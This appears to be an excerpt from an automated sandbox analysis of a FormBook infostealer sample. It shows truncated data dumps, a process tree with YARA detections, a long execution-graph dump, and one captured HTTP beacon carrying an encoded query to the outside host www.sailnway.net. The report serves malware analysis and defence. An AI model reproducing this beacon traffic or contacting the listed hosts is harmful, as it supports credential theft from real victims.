                                                    Data Raw: 79 30 71 74 33 46 3d 72 42 44 47 6e 6d 46 70 63 6c 4f 2f 44 65 30 69 34 75 31 73 73 48 66 38 6a 7a 68 56 41 6d 63 51 74 6c 6e 55 46 77 35 52 65 74 42 56 43 30 46 6d 4f 4c 61 65 31 58 42 4d 65 76 33 30 61 32 47 76 74 72 44 53 6f 75 5a 54 74 4e 68 6e 6e 53 43 51 76 49 47 30 65 6d 4c 79 47 41 75 65 50 38 39 71 35 31 42 67 6a 65 65 58 51 51 77 42 33 53 74 63 62 44 62 71 70 4d 4d 53 77 50 51 5a 54 55 31 4f 36 4a 78 6d 4a 78 56 79 65 62 6c 65 51 73 39 50 79 75 38 4d 46 79 44 49 71 73 47 4c 6b 41 4b 2b 6d 47 6b 32 4e 57 66 4f 4c 50 76 74 75 68 47 56 38 49 4a 38 37 6f 44 32 2b 6d 57 66 43 49 4d 76 65 75 62 70 4b 65 37 33 62 59 51 43 44 6a 62 68 46 72 56 6f 44 74 75 4c 6e 2f 70 7a 39 36 5a 57 6c 30 6e 2f 30 6c 46 75 33 44 5a 51 6c 77 33 43 4c 38 32 64 54 65 78 74 50 48 58 31 6c 6d 33 66 6e 75 6f 72 78 31 52 2b 64 36 4e 6e 42 6e 71 6f 2b 6a 56 43 52 69 53 6a 44 6e 56 33 35 6f 61 6c 47 49 58 4f 6b 4b 76 52 73 36 79 30 78 73 62 65 30 35 56 38 2f 72 57 66 32 73 56 41 63 7a 4b 55 51 45 75 54 74 53 36 6e 58 56 32 [TRUNCATED]
                                                    Data Ascii: y0qt3F=rBDGnmFpclO/De0i4u1ssHf8jzhVAmcQtlnUFw5RetBVC0FmOLae1XBMev30a2GvtrDSouZTtNhnnSCQvIG0emLyGAueP89q51BgjeeXQQwB3StcbDbqpMMSwPQZTU1O6JxmJxVyebleQs9Pyu8MFyDIqsGLkAK+mGk2NWfOLPvtuhGV8IJ87oD2+mWfCIMveubpKe73bYQCDjbhFrVoDtuLn/pz96ZWl0n/0lFu3DZQlw3CL82dTextPHX1lm3fnuorx1R+d6NnBnqo+jVCRiSjDnV35oalGIXOkKvRs6y0xsbe05V8/rWf2sVAczKUQEuTtS6nXV2OmodCPiEAIjrSDt9WDQbg23OL+fCIySnOi3Ow8yIZXE4j9DmYqI+YW/QymwxByOJ8tm6J94KmCQQMiwfR4c9xRAL2AWg9GhJ78HN1cDkVjc7IOSxEw24GYcMNSPjfbNGj0niurHqvOgjJw6OMXH/+pW1XSrdR/otoSO5yUYWz6gEMPGSurFE3S8MoHaH0WnP2vU9U2I7S2yYL4fspnTpn/KGCusAbJO7AM27rB2JGdUDvn0t7rMSyydIyVQ6rXF0NAXh79rMVXL6g7jsQ6w8umPFuGv3lPF7PVc0DXfVON23Vfj1KSuoh7W39uDVqbzAFznUyfmRTHJgEcC7wmgm/na+mc2dfx08nRaD1lxHq6pFNq7RsPMfMfou7dEZhf/HacduW1/6EbGGrwg++VBqmp2vesvizXOM/R2igRN6Pr7n+bqSBzE38m9F/iA4agiDjFnpUk27shQ97F7xB21b6yYKlYid5AgT9PSBD5VJ0fQXPGy7XuMoDY2JJ1sJbChIugPwhM/EVEiyPkQ1xceZPKX5vPBgfp7sgo9pUhGE+HVnZhM/pbqqS0MbG9M9yJ7MA6xrNya12Ol1rCj2eMSF/FsLC7wJ2HXYuk80Ix/9UUaRbWvAfu7fZomd5veY55JtxF3hVxLNPORQSj+2DLZQ3GbYV0RMpsq136 [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    40 | 192.168.2.4 | 49781 | 85.159.66.93 | 80 | 1880 | C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 26, 2024 09:26:43.640921116 CEST | 542 | OUT | GET /lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpI HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Host: www.sailnway.net
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)


                                                    Target ID:0
                                                    Start time:03:23:00
                                                    Start date:26/09/2024
                                                    Path:C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
                                                    Imagebase:0x400000
                                                    File size:1'353'653 bytes
                                                    MD5 hash:05643E059A165F8B6B3B3E4BD0D9F226
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:1
                                                    Start time:03:23:08
                                                    Start date:26/09/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"
                                                    Imagebase:0xf0000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:03:23:22
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe"
                                                    Imagebase:0x7e0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:6
                                                    Start time:03:23:26
                                                    Start date:26/09/2024
                                                    Path:C:\Windows\SysWOW64\netbtugc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                    Imagebase:0x1e0000
                                                    File size:22'016 bytes
                                                    MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:03:23:38
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe"
                                                    Imagebase:0x7e0000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:8
                                                    Start time:03:24:00
                                                    Start date:26/09/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6bf500000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:3.7%
                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                      Signature Coverage:9.6%
                                                      Total number of Nodes:2000
                                                      Total number of Limit Nodes:34
85268->85269 85270 41500f 85268->85270 85761 417f77 46 API calls __getptd_noexit 85269->85761 85272 415471 __lock_file 47 API calls 85270->85272 85274 415017 85272->85274 85273 414fff 85762 417f25 10 API calls __wcsicoll 85273->85762 85276 414e4e __ftell_nolock 51 API calls 85274->85276 85277 415024 85276->85277 85763 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85277->85763 85279 41500a __alloc_osfhnd 85279->85182 85281 414dd6 85280->85281 85282 414deb 85280->85282 85289 417f77 46 API calls __getptd_noexit 85281->85289 85282->85281 85286 414df2 85282->85286 85284 414ddb 85290 417f25 10 API calls __wcsicoll 85284->85290 85287 414de6 85286->85287 85291 418f98 77 API calls 6 library calls 85286->85291 85287->85234 85289->85284 85290->85287 85291->85287 85295 414910 __alloc_osfhnd 85292->85295 85293 414923 85348 417f77 46 API calls __getptd_noexit 85293->85348 85295->85293 85297 414951 85295->85297 85296 414928 85349 417f25 10 API calls __wcsicoll 85296->85349 85311 41d4d1 85297->85311 85300 414956 85301 41496a 85300->85301 85302 41495d 85300->85302 85304 414992 85301->85304 85305 414972 85301->85305 85350 417f77 46 API calls __getptd_noexit 85302->85350 85328 41d218 85304->85328 85351 417f77 46 API calls __getptd_noexit 85305->85351 85308 414933 __alloc_osfhnd @_EH4_CallFilterFunc@8 85308->85238 85312 41d4dd __alloc_osfhnd 85311->85312 85313 4182cb __lock 46 API calls 85312->85313 85325 41d4eb 85313->85325 85314 41d567 85315 416b04 __malloc_crt 46 API calls 85314->85315 85317 41d56e 85315->85317 85319 41d57c InitializeCriticalSectionAndSpinCount 85317->85319 85326 41d560 85317->85326 85318 41d5f0 __alloc_osfhnd 85318->85300 85320 41d59c 85319->85320 85321 41d5af EnterCriticalSection 85319->85321 85324 413748 _free 46 API calls 85320->85324 85321->85326 85322 418209 __mtinitlocknum 46 API calls 85322->85325 85324->85326 85325->85314 85325->85322 85325->85326 85356 4154b2 47 API calls __lock 85325->85356 85357 415520 LeaveCriticalSection 
LeaveCriticalSection _doexit 85325->85357 85353 41d5fb 85326->85353 85329 41d23a 85328->85329 85330 41d255 85329->85330 85342 41d26c __wopenfile 85329->85342 85362 417f77 46 API calls __getptd_noexit 85330->85362 85331 41d421 85334 41d47a 85331->85334 85335 41d48c 85331->85335 85333 41d25a 85363 417f25 10 API calls __wcsicoll 85333->85363 85367 417f77 46 API calls __getptd_noexit 85334->85367 85359 422bf9 85335->85359 85339 41d47f 85368 417f25 10 API calls __wcsicoll 85339->85368 85340 41499d 85352 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85340->85352 85342->85331 85342->85334 85364 41341f 58 API calls 2 library calls 85342->85364 85344 41d41a 85344->85331 85365 41341f 58 API calls 2 library calls 85344->85365 85346 41d439 85346->85331 85366 41341f 58 API calls 2 library calls 85346->85366 85348->85296 85349->85308 85350->85308 85351->85308 85352->85308 85358 4181f2 LeaveCriticalSection 85353->85358 85355 41d602 85355->85318 85356->85325 85357->85325 85358->85355 85369 422b35 85359->85369 85361 422c14 85361->85340 85362->85333 85363->85340 85364->85344 85365->85346 85366->85331 85367->85339 85368->85340 85370 422b41 __alloc_osfhnd 85369->85370 85371 422b54 85370->85371 85374 422b8a 85370->85374 85372 417f77 __wcsicoll 46 API calls 85371->85372 85373 422b59 85372->85373 85376 417f25 __wcsicoll 10 API calls 85373->85376 85375 422400 __tsopen_nolock 109 API calls 85374->85375 85377 422ba4 85375->85377 85379 422b63 __alloc_osfhnd 85376->85379 85378 422bcb __wsopen_helper LeaveCriticalSection 85377->85378 85378->85379 85379->85361 85383 4150dd __alloc_osfhnd 85380->85383 85381 4150e9 85411 417f77 46 API calls __getptd_noexit 85381->85411 85383->85381 85384 41510f 85383->85384 85393 415471 85384->85393 85385 4150ee 85412 417f25 10 API calls __wcsicoll 85385->85412 85392 4150f9 __alloc_osfhnd 85392->85244 85394 415483 85393->85394 85395 4154a5 EnterCriticalSection 85393->85395 85394->85395 85396 41548b 85394->85396 85397 415117 85395->85397 85398 4182cb 
__lock 46 API calls 85396->85398 85399 415047 85397->85399 85398->85397 85400 415067 85399->85400 85401 415057 85399->85401 85406 415079 85400->85406 85414 414e4e 85400->85414 85469 417f77 46 API calls __getptd_noexit 85401->85469 85405 41505c 85413 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85405->85413 85431 41443c 85406->85431 85409 4150b9 85444 41e1f4 85409->85444 85411->85385 85412->85392 85413->85392 85415 414e61 85414->85415 85416 414e79 85414->85416 85470 417f77 46 API calls __getptd_noexit 85415->85470 85417 414139 __fclose_nolock 46 API calls 85416->85417 85419 414e80 85417->85419 85422 41e1f4 __write 51 API calls 85419->85422 85420 414e66 85471 417f25 10 API calls __wcsicoll 85420->85471 85423 414e97 85422->85423 85424 414f09 85423->85424 85426 414ec9 85423->85426 85430 414e71 85423->85430 85472 417f77 46 API calls __getptd_noexit 85424->85472 85427 41e1f4 __write 51 API calls 85426->85427 85426->85430 85428 414f64 85427->85428 85429 41e1f4 __write 51 API calls 85428->85429 85428->85430 85429->85430 85430->85406 85432 414455 85431->85432 85436 414477 85431->85436 85433 414139 __fclose_nolock 46 API calls 85432->85433 85432->85436 85434 414470 85433->85434 85473 41b7b2 77 API calls 6 library calls 85434->85473 85437 414139 85436->85437 85438 414145 85437->85438 85439 41415a 85437->85439 85474 417f77 46 API calls __getptd_noexit 85438->85474 85439->85409 85441 41414a 85475 417f25 10 API calls __wcsicoll 85441->85475 85443 414155 85443->85409 85445 41e200 __alloc_osfhnd 85444->85445 85446 41e223 85445->85446 85447 41e208 85445->85447 85448 41e22f 85446->85448 85454 41e269 85446->85454 85496 417f8a 46 API calls __getptd_noexit 85447->85496 85498 417f8a 46 API calls __getptd_noexit 85448->85498 85451 41e20d 85497 417f77 46 API calls __getptd_noexit 85451->85497 85453 41e234 85499 417f77 46 API calls __getptd_noexit 85453->85499 85476 41ae56 85454->85476 85457 41e23c 85500 417f25 10 API calls __wcsicoll 85457->85500 85458 41e26f 85459 41e291 
85458->85459 85460 41e27d 85458->85460 85501 417f77 46 API calls __getptd_noexit 85459->85501 85486 41e17f 85460->85486 85464 41e215 __alloc_osfhnd 85464->85405 85465 41e289 85503 41e2c0 LeaveCriticalSection __unlock_fhandle 85465->85503 85466 41e296 85502 417f8a 46 API calls __getptd_noexit 85466->85502 85469->85405 85470->85420 85471->85430 85472->85430 85473->85436 85474->85441 85475->85443 85477 41ae62 __alloc_osfhnd 85476->85477 85478 41aebc 85477->85478 85479 4182cb __lock 46 API calls 85477->85479 85480 41aec1 EnterCriticalSection 85478->85480 85481 41aede __alloc_osfhnd 85478->85481 85482 41ae8e 85479->85482 85480->85481 85481->85458 85483 41aeaa 85482->85483 85484 41ae97 InitializeCriticalSectionAndSpinCount 85482->85484 85485 41aeec ___lock_fhandle LeaveCriticalSection 85483->85485 85484->85483 85485->85478 85487 41aded __lseeki64_nolock 46 API calls 85486->85487 85488 41e18e 85487->85488 85489 41e1a4 SetFilePointer 85488->85489 85490 41e194 85488->85490 85492 41e1c3 85489->85492 85493 41e1bb GetLastError 85489->85493 85491 417f77 __wcsicoll 46 API calls 85490->85491 85494 41e199 85491->85494 85492->85494 85495 417f9d __dosmaperr 46 API calls 85492->85495 85493->85492 85494->85465 85495->85494 85496->85451 85497->85464 85498->85453 85499->85457 85500->85464 85501->85466 85502->85465 85503->85464 85505 4149ea 85504->85505 85506 4149fe 85504->85506 85550 417f77 46 API calls __getptd_noexit 85505->85550 85507 4149fa 85506->85507 85509 41443c __flush 77 API calls 85506->85509 85522 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 85507->85522 85511 414a0a 85509->85511 85510 4149ef 85551 417f25 10 API calls __wcsicoll 85510->85551 85523 41d8c2 85511->85523 85515 414139 __fclose_nolock 46 API calls 85516 414a18 85515->85516 85527 41d7fe 85516->85527 85518 414a1e 85518->85507 85519 413748 _free 46 API calls 85518->85519 85519->85507 85520->85254 85521->85258 85522->85258 85524 41d8d2 85523->85524 85526 414a12 85523->85526 85525 413748 _free 46 API 
calls 85524->85525 85524->85526 85525->85526 85526->85515 85528 41d80a __alloc_osfhnd 85527->85528 85529 41d812 85528->85529 85530 41d82d 85528->85530 85567 417f8a 46 API calls __getptd_noexit 85529->85567 85532 41d839 85530->85532 85535 41d873 85530->85535 85569 417f8a 46 API calls __getptd_noexit 85532->85569 85533 41d817 85568 417f77 46 API calls __getptd_noexit 85533->85568 85538 41ae56 ___lock_fhandle 48 API calls 85535->85538 85537 41d83e 85570 417f77 46 API calls __getptd_noexit 85537->85570 85540 41d879 85538->85540 85543 41d893 85540->85543 85544 41d887 85540->85544 85541 41d846 85571 417f25 10 API calls __wcsicoll 85541->85571 85572 417f77 46 API calls __getptd_noexit 85543->85572 85552 41d762 85544->85552 85545 41d81f __alloc_osfhnd 85545->85518 85548 41d88d 85573 41d8ba LeaveCriticalSection __unlock_fhandle 85548->85573 85550->85510 85551->85507 85574 41aded 85552->85574 85554 41d7c8 85587 41ad67 47 API calls 2 library calls 85554->85587 85556 41d772 85556->85554 85557 41d7a6 85556->85557 85558 41aded __lseeki64_nolock 46 API calls 85556->85558 85557->85554 85559 41aded __lseeki64_nolock 46 API calls 85557->85559 85561 41d79d 85558->85561 85562 41d7b2 CloseHandle 85559->85562 85560 41d7d0 85563 41d7f2 85560->85563 85588 417f9d 46 API calls 3 library calls 85560->85588 85564 41aded __lseeki64_nolock 46 API calls 85561->85564 85562->85554 85565 41d7be GetLastError 85562->85565 85563->85548 85564->85557 85565->85554 85567->85533 85568->85545 85569->85537 85570->85541 85571->85545 85572->85548 85573->85545 85575 41ae12 85574->85575 85576 41adfa 85574->85576 85578 417f8a __free_osfhnd 46 API calls 85575->85578 85581 41ae51 85575->85581 85577 417f8a __free_osfhnd 46 API calls 85576->85577 85579 41adff 85577->85579 85580 41ae23 85578->85580 85582 417f77 __wcsicoll 46 API calls 85579->85582 85583 417f77 __wcsicoll 46 API calls 85580->85583 85581->85556 85584 41ae07 85582->85584 85585 41ae2b 85583->85585 85584->85556 85586 417f25 __wcsicoll 10 API calls 
85585->85586 85586->85584 85587->85560 85588->85563 85590 414c82 __alloc_osfhnd 85589->85590 85591 414cc3 85590->85591 85592 414c96 __crtGetStringTypeA_stat 85590->85592 85593 414cbb __alloc_osfhnd 85590->85593 85594 415471 __lock_file 47 API calls 85591->85594 85616 417f77 46 API calls __getptd_noexit 85592->85616 85593->85263 85596 414ccb 85594->85596 85602 414aba 85596->85602 85597 414cb0 85617 417f25 10 API calls __wcsicoll 85597->85617 85606 414ad8 __crtGetStringTypeA_stat 85602->85606 85608 414af2 85602->85608 85603 414ae2 85669 417f77 46 API calls __getptd_noexit 85603->85669 85605 414ae7 85670 417f25 10 API calls __wcsicoll 85605->85670 85606->85603 85606->85608 85611 414b2d 85606->85611 85618 414cfa LeaveCriticalSection LeaveCriticalSection __wfsopen 85608->85618 85610 414c38 __crtGetStringTypeA_stat 85672 417f77 46 API calls __getptd_noexit 85610->85672 85611->85608 85611->85610 85612 414139 __fclose_nolock 46 API calls 85611->85612 85619 41dfcc 85611->85619 85649 41d8f3 85611->85649 85671 41e0c2 46 API calls 3 library calls 85611->85671 85612->85611 85616->85597 85617->85593 85618->85593 85620 41dfd8 __alloc_osfhnd 85619->85620 85621 41dfe0 85620->85621 85624 41dffb 85620->85624 85742 417f8a 46 API calls __getptd_noexit 85621->85742 85623 41e007 85744 417f8a 46 API calls __getptd_noexit 85623->85744 85624->85623 85627 41e041 85624->85627 85625 41dfe5 85743 417f77 46 API calls __getptd_noexit 85625->85743 85630 41e063 85627->85630 85631 41e04e 85627->85631 85629 41e00c 85745 417f77 46 API calls __getptd_noexit 85629->85745 85635 41ae56 ___lock_fhandle 48 API calls 85630->85635 85747 417f8a 46 API calls __getptd_noexit 85631->85747 85633 41e014 85746 417f25 10 API calls __wcsicoll 85633->85746 85637 41e069 85635->85637 85636 41e053 85748 417f77 46 API calls __getptd_noexit 85636->85748 85641 41e077 85637->85641 85642 41e08b 85637->85642 85640 41dfed __alloc_osfhnd 85640->85611 85673 41da15 85641->85673 85749 417f77 46 API calls __getptd_noexit 85642->85749 
85645 41e083 85751 41e0ba LeaveCriticalSection __unlock_fhandle 85645->85751 85646 41e090 85750 417f8a 46 API calls __getptd_noexit 85646->85750 85650 41d900 85649->85650 85653 41d915 85649->85653 85755 417f77 46 API calls __getptd_noexit 85650->85755 85652 41d905 85756 417f25 10 API calls __wcsicoll 85652->85756 85655 41d94a 85653->85655 85660 41d910 85653->85660 85752 420603 85653->85752 85657 414139 __fclose_nolock 46 API calls 85655->85657 85658 41d95e 85657->85658 85659 41dfcc __read 59 API calls 85658->85659 85661 41d965 85659->85661 85660->85611 85661->85660 85662 414139 __fclose_nolock 46 API calls 85661->85662 85663 41d988 85662->85663 85663->85660 85664 414139 __fclose_nolock 46 API calls 85663->85664 85665 41d994 85664->85665 85665->85660 85666 414139 __fclose_nolock 46 API calls 85665->85666 85667 41d9a1 85666->85667 85668 414139 __fclose_nolock 46 API calls 85667->85668 85668->85660 85669->85605 85670->85608 85671->85611 85672->85605 85674 41da31 85673->85674 85675 41da4c 85673->85675 85676 417f8a __free_osfhnd 46 API calls 85674->85676 85677 41da5b 85675->85677 85679 41da7a 85675->85679 85678 41da36 85676->85678 85680 417f8a __free_osfhnd 46 API calls 85677->85680 85682 417f77 __wcsicoll 46 API calls 85678->85682 85681 41da98 85679->85681 85696 41daac 85679->85696 85683 41da60 85680->85683 85685 417f8a __free_osfhnd 46 API calls 85681->85685 85693 41da3e 85682->85693 85684 417f77 __wcsicoll 46 API calls 85683->85684 85687 41da67 85684->85687 85689 41da9d 85685->85689 85686 41db02 85688 417f8a __free_osfhnd 46 API calls 85686->85688 85690 417f25 __wcsicoll 10 API calls 85687->85690 85691 41db07 85688->85691 85692 417f77 __wcsicoll 46 API calls 85689->85692 85690->85693 85694 417f77 __wcsicoll 46 API calls 85691->85694 85695 41daa4 85692->85695 85693->85645 85694->85695 85699 417f25 __wcsicoll 10 API calls 85695->85699 85696->85686 85696->85693 85697 41dae1 85696->85697 85698 41db1b 85696->85698 85697->85686 85705 41daec ReadFile 85697->85705 85701 
416b04 __malloc_crt 46 API calls 85698->85701 85699->85693 85702 41db31 85701->85702 85706 41db59 85702->85706 85707 41db3b 85702->85707 85703 41dc17 85704 41df8f GetLastError 85703->85704 85712 41dc2b 85703->85712 85708 41de16 85704->85708 85709 41df9c 85704->85709 85705->85703 85705->85704 85713 420494 __lseeki64_nolock 48 API calls 85706->85713 85711 417f77 __wcsicoll 46 API calls 85707->85711 85716 417f9d __dosmaperr 46 API calls 85708->85716 85722 41dd9b 85708->85722 85710 417f77 __wcsicoll 46 API calls 85709->85710 85714 41dfa1 85710->85714 85715 41db40 85711->85715 85721 41de5b 85712->85721 85712->85722 85723 41dc47 85712->85723 85717 41db67 85713->85717 85718 417f8a __free_osfhnd 46 API calls 85714->85718 85719 417f8a __free_osfhnd 46 API calls 85715->85719 85716->85722 85717->85705 85718->85722 85719->85693 85720 413748 _free 46 API calls 85720->85693 85721->85722 85725 41ded0 ReadFile 85721->85725 85722->85693 85722->85720 85724 41dcab ReadFile 85723->85724 85726 41dd28 85723->85726 85727 41dcc9 GetLastError 85724->85727 85734 41dcd3 85724->85734 85728 41deef GetLastError 85725->85728 85735 41def9 85725->85735 85726->85722 85731 41dd96 85726->85731 85733 41dda3 85726->85733 85737 41dd60 85726->85737 85727->85723 85727->85734 85728->85721 85728->85735 85729 41ddec MultiByteToWideChar 85729->85722 85730 41de10 GetLastError 85729->85730 85730->85708 85732 417f77 __wcsicoll 46 API calls 85731->85732 85732->85722 85733->85737 85738 41ddda 85733->85738 85734->85723 85739 420494 __lseeki64_nolock 48 API calls 85734->85739 85735->85721 85736 420494 __lseeki64_nolock 48 API calls 85735->85736 85736->85735 85737->85729 85740 420494 __lseeki64_nolock 48 API calls 85738->85740 85739->85734 85741 41dde9 85740->85741 85741->85729 85742->85625 85743->85640 85744->85629 85745->85633 85746->85640 85747->85636 85748->85633 85749->85646 85750->85645 85751->85640 85753 416b04 __malloc_crt 46 API calls 85752->85753 85754 420618 85753->85754 85754->85655 85755->85652 
85756->85660 85760 4148b3 GetSystemTimeAsFileTime __aulldiv 85757->85760 85759 442c6b 85759->85266 85760->85759 85761->85273 85762->85279 85763->85279 85769 45272f __tzset_nolock _wcscpy 85764->85769 85765 44afef GetSystemTimeAsFileTime 85765->85769 85766 414d04 61 API calls __fread_nolock 85766->85769 85767 4528a4 85767->85188 85767->85189 85768 4150d1 81 API calls _fseek 85768->85769 85769->85765 85769->85766 85769->85767 85769->85768 85771 44b1bc 85770->85771 85772 44b1ca 85770->85772 85773 4149c2 116 API calls 85771->85773 85774 44b1e1 85772->85774 85775 44b1d8 85772->85775 85776 4149c2 116 API calls 85772->85776 85773->85772 85805 4321a4 85774->85805 85775->85215 85778 44b2db 85776->85778 85778->85774 85780 44b2e9 85778->85780 85779 44b224 85782 44b253 85779->85782 85783 44b228 85779->85783 85781 44b2f6 85780->85781 85784 414a46 __fcloseall 82 API calls 85780->85784 85781->85215 85809 43213d 85782->85809 85786 44b235 85783->85786 85788 414a46 __fcloseall 82 API calls 85783->85788 85784->85781 85789 44b245 85786->85789 85792 414a46 __fcloseall 82 API calls 85786->85792 85787 44b25a 85790 44b260 85787->85790 85791 44b289 85787->85791 85788->85786 85789->85215 85793 44b26d 85790->85793 85795 414a46 __fcloseall 82 API calls 85790->85795 85819 44b0bf 87 API calls 85791->85819 85792->85789 85796 44b27d 85793->85796 85799 414a46 __fcloseall 82 API calls 85793->85799 85795->85793 85796->85215 85797 44b28f 85820 4320f8 46 API calls _free 85797->85820 85799->85796 85800 44b295 85801 44b2a2 85800->85801 85802 414a46 __fcloseall 82 API calls 85800->85802 85803 44b2b2 85801->85803 85804 414a46 __fcloseall 82 API calls 85801->85804 85802->85801 85803->85215 85804->85803 85806 4321cb 85805->85806 85808 4321b4 __tzset_nolock _memmove 85805->85808 85807 414d04 __fread_nolock 61 API calls 85806->85807 85807->85808 85808->85779 85810 4135bb _malloc 46 API calls 85809->85810 85811 432150 85810->85811 85812 4135bb _malloc 46 API calls 85811->85812 85813 432162 85812->85813 85814 
